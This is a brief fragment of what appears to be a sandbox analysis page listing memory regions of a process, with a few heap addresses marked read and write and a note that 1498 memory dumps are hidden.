3F29000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
386000
|
heap
|
page read and write
|
||
|
5CA8000
|
heap
|
page read and write
|
There are 1498 hidden memdumps, click here to show them.